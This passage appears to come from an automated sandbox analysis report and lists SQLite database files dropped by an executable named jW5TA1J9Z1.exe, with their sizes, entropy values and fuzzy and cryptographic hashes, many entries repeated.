                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):98304
                                                                    Entropy (8bit):0.08235737944063153
                                                                    Encrypted:false
                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
